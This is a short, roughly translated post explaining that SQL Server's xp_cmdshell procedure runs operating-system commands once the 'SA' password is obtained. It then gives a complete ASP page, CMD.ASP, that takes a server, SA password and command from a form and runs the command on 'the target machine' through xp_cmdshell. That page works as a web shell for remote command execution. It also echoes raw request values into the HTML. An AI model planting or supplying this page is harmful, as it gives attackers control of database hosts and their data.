The stored procedure Xp_CMDSHELL is to execute the CMD command and require the SA authority when the users logging in system, that is, once the SA command from SQL SERVER 2008 is gotten, whatever can be done in the target machine .Some known software also use this store procedure to achieve the operation of the target machine.
There is a simple ASP code below:
CMD.ASP
<%@LANGUAGE=”VBSCRIPT” CODEPAGE=”936″%>
<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN” “http://www.w3.org/TR/html4/loose.dtd”>
<html><head>
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″>
<title>SQLSERVER_XP_CMDSHELL instance _ magician</title>
<style type=”text/css”>
<!–
body{
font-size:13px;
line-height:20px;
width:760;
SCROLLBAR-FACE-COLOR: #2896e1;
SCROLLBAR-SHADOW-COLOR: #6cb4d8;
SCROLLBAR-ARROW-COLOR: #f0f0f0;
SCROLLBAR-DARKSHADOW-COLOR: #2896e1;
SCROLLBAR-BASE-COLOR: #2896e1;
background-image: url(images/bg.gif);
}
.LBR{
border-top:0px solid #336699;
border-left:1px solid #336699;
border-right:1px solid #336699;
border-bottom:1px solid #336699;
}
.all_h {
border: 1px solid #336699;
}
.input {
border: 1px solid #336699;
background-color:#ECEAFD;
}
.LB{
border-top:0px solid #336699;
border-left:1px solid #336699;
border-right:0px solid #336699;
border-bottom:1px solid #336699;
}
.N1 {font-weight:bold;color:#339933;font-size:13px;}
.N2 {font-weight:bold;color:#ff0000;font-size:13px;}
–>
</style>
</head>
<body>
<%if request(”cmd”)<>”" then%>
<table width=400 border=0 align=center cellpadding=5 cellspacing=0>
<tr align=center>
<td height=30 class=all_h bgcolor=#B3E0FF ><span class=N1>XP_CMDSHELL request the outcome</span></td>
</tr>
<%
dim connstr,conn,rs,i
ConnStr=”Provider=sqloledb.1;persist security info=false;server=”&request(”server”)&”;uid=sa;pwd=”&request(”pwd”)&”;database=master”
‘ConnStr=”Provider=sqloledb.1;persist security info=false;server=(local);uid=sa;pwd=www.zhi.net;database=master”
set conn=Server.CreateObject(”ADODB.Connection”)
conn.open Connstr
set rs=server.CreateObject(”ADODB.Recordset”)
set rs=conn.execute(”xp_cmdshell ‘”&replace(replace(request(”cmd”),”‘”,”””),chr(34),”””)&”‘”)
i=0
while not rs.eof
if not isnull(rs(0)) then
if i mod 2 =0 then
response.Write “<tr><td class=”"LBR”" bgcolor=”"#DEF3FF”">”&rs(0)&”</td></tr>”
else
response.Write “<tr><td class=”"LBR”">”&rs(0)&”</td></tr>”
end if
i=i+1
end if
rs.movenext
wend
rs.close
set rs=nothing
conn.close
set conn=nothing
%>
</table>
<%end if%>
<form name=”form1″ method=”post” action=”">
<table width=400 border=0 align=center cellpadding=5 cellspacing=0>
<tr align=center>
<td height=30 colspan=2 class=all_h bgcolor=#B3E0FF ><span class=N1>XP_CMDSHELL instance</span></td>
</tr>
<tr align=center bgcolor=#DEF3FF>
<td width=26% class=LB><strong>Server</strong></td>
<td width=74% class=LBR><div align=”left”>
<input name=”Server” type=”text” id=”Server” class=”input” size=”20″ value=”<%=request(”Server”)%>”>
</div></td>
</tr>
<tr align=center >
<td class=LB><b>SA密码 </b></td>
<td class=LBR><div align=”left”><span class=N1>
<input name=”PWD” type=”text” id=”PWD” class=”input” size=”20″ value=”<%=request(”PWD”)%>”>
</span></div></td>
</tr>
<tr align=center bgcolor=#DEF3FF>
<td width=26% class=LB><strong>CMD command</strong></td>
<td width=74% class=LBR><div align=”left”>
<input name=”CMD” type=”text” id=”CMD” class=”input” size=”20″ value=”<%=request(”CMD”)%>”>
</div></td>
</tr>
<tr align=center >
<td colspan=”2″ class=LBR><div align=”center”><b> </b>
<input type=”submit” name=”Submit” value=” submit Command ” class=”input”>
</div></td>
</tr>
</table>
</form>
</body>
</html>